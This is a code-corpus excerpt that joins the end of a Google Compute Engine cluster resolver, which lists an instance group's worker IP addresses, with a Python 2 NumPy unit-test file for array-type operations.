specified instance group. We will retrieve the information from the GCE APIs
every time this method is called.
Returns:
A ClusterSpec containing host information retrieved from GCE.
"""
request_body = {'instanceState': 'RUNNING'}
request = self._service.instanceGroups().listInstances(
project=self._project,
zone=self._zone,
instanceGroups=self._instance_group,
body=request_body,
orderBy='name')
worker_list = []
while request is not None:
response = request.execute()
items = response['items']
for instance in items:
instance_name = instance['instance'].split('/')[-1]
instance_request = self._service.instances().get(
project=self._project,
zone=self._zone,
instance=instance_name)
if instance_request is not None:
instance_details = instance_request.execute()
ip_address = instance_details['networkInterfaces'][0]['networkIP']
instance_url = '%s:%s' % (ip_address, self._port)
worker_list.append(instance_url)
request = self._service.instanceGroups().listInstances_next(
previous_request=request,
previous_response=response)
worker_list.sort()
return ClusterSpec({self._job_name: worker_list})
def master(self):
return ''
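# Hypothetical usage sketch (project, zone, and instance-group names are
# made up; requires googleapiclient and application-default credentials):
# resolver = GceClusterResolver(project='my-project', zone='us-central1-a',
#                               instance_group='tf-workers', port=8470)
# spec = resolver.cluster_spec()
# # e.g. ClusterSpec({'worker': ['10.240.0.2:8470', '10.240.0.3:8470']})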
| apache-2.0 |
tcheehow/MissionPlanner | Lib/site-packages/numpy/core/tests/test_npy_arraytypes.py | 54 | 5864 | import sys
import warnings
import numpy as np
from numpy.testing import *
warnings.filterwarnings('ignore',
'Casting complex values to real discards the imaginary part')
types = [np.bool_, np.byte, np.ubyte, np.short, np.ushort, np.intc, np.uintc,
np.int_, np.uint, np.longlong, np.ulonglong,
np.single, np.double, np.longdouble, np.csingle,
np.cdouble, np.clongdouble]
alltypes = list( types )
alltypes.append( np.datetime64 )
alltypes.append( np.timedelta64 )
class TestArrayTypes(TestCase):
def test_argmax( self ):
x = np.array( [False, False, True, False], dtype=np.bool )
assert x.argmax() == 2, "Broken array.argmax on np.bool"
a = np.array( [u'aaa', u'aa', u'bbb'] )
# u'aaa' > u'aa' and u'bbb' > u'aaa' Hence, argmax == 2.
assert a.argmax() == 2, "Broken array.argmax on unicode data."
a = np.array( [ 'aaa', 'aa', 'bbb'] )
# 'aaa' > 'aa' and 'bbb' > 'aaa' Hence, argmax == 2.
assert a.argmax() == 2, "Broken array.argmax on string data."
def test_argmax_numeric( self ):
# Skip the np.bool_ type as it lacks a fill function, hence can't use
# arange().
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
assert a.argmax() == 4, "Broken array.argmax on type: " + t
def test_nonzero_numeric_types( self ):
for k,t in enumerate(alltypes):
a = np.array( [ t(1) ] )
assert a, "Broken array.nonzero on type: " + t
def test_nonzero_string_types( self ):
a = np.array( [ 'aaa' ] )
assert a, "Broken array.nonzero on string elements."
a = np.array( [ u'aaa' ] )
assert a, "Broken array.nonzero on Unicode elements."
def test_compare( self ):
# Light bulb! argmax doesn't call compare() for numeric/logical
# types. It only does that for string types. Duh.
pass
def test_copyswap( self ):
# Skip np.bool_.
for k,t in enumerate( types[1:] ):
x = np.arange( 10, dtype=t )
# This should exercise <type>_copyswap
x[::2].fill( t(2) )
assert_equal( x, [2,1,2,3,2,5,2,7,2,9] )
def test_copyswap_misc( self ):
x = np.array( [ u'a', u'b', u'c' ] )
x[::2].fill( u'd' )
assert_equal( x, [u'd', u'b', u'd'] )
def test_copyswapn( self ):
# bool lacks arange support.
for k,t in enumerate( alltypes[1:] ):
x = np.arange( 10, dtype=t )
y = x.byteswap()
z = y.byteswap()
assert_equal( z, x )
def test_copyswapn_misc( self ):
x = np.array( [ u'a', u'b', u'c' ] )
y = x.byteswap()
z = y.byteswap()
assert_equal( z, x )
def test_searchsorted_insert( self ):
for k,t in enumerate( alltypes[1:] ):
try:
a = np.arange( 10, dtype=t )
keys = a[::2]
b = a.searchsorted( keys )
c = a.copy()
np.insert( c, b, b.astype( t ) )
c.sort()
assert_equal( c, a )
except TypeError, e:
print "Trouble with type %d:" % k, e
def test_compare_bool( self ):
# bool can't handle numpy.arange(), so has to be coded separately.
a = np.array( [False, True], dtype=np.bool_ )
keys = a
b = a.searchsorted( keys )
c = a.copy()
np.insert( c, b, keys )
c.sort()
assert_equal( c, a )
def test_dot( self ):
# Do something to test dot on bool...
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 3, dtype=t ) + 1
assert a.dot(a) == t(14), \
"Problem with dot product with array of type %s" % k
def test_clip( self ):
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
b = a.clip( 2, 3 )
x = np.array( [2,2,2,3,3], dtype=t )
assert_equal( b, x )
def test_clip_bool( self ):
a = np.array( [False, True], np.bool )
assert_equal( a.clip(False,False), [False, False] )
def test_array_casting( self ):
for k,t in enumerate( alltypes ):
a = np.array( [ t(1) ] )
for k2, t2 in enumerate( alltypes ):
b = a.astype( t2 )
if k2 < len(types):
assert b[0] == 1, \
"Busted array type casting: k=%d k2=%d" % (k,k2)
else:
# Casting to datetime64 yields a 1/1/1970+... result,
# which isn't so hot for checking against "1". So, in
# these cases, just cast back to the starting time, and
# make sure we got back what we started with.
c = b.astype( t )
assert_equal( c, a )
def test_take( self ):
# Test all types, but skip np.bool_ for now, as it lacks a fill
# function. Grrr.
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 10, dtype=t )
idx = np.arange(5) * 2
c = np.take( a, idx )
assert_equal( c, a[::2] )
def test_putmask( self ):
for k,t in enumerate( alltypes[1:] ):
a = np.arange( 5, dtype=t )
mask = np.zeros( 5, dtype=np.bool )
mask[::2] = True
np.putmask( a, mask, t(8) )
x = np.array( [8,1,8,3,8], dtype=t )
assert_equal( a, x )
def test_fillwithscalar( self ):
a = np.empty( 2, dtype=np.datetime64 )
a.fill( np.datetime64( 3 ) )
x = np.zeros( 2, dtype=np.datetime64 ) + 3
assert_equal( a, x )
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |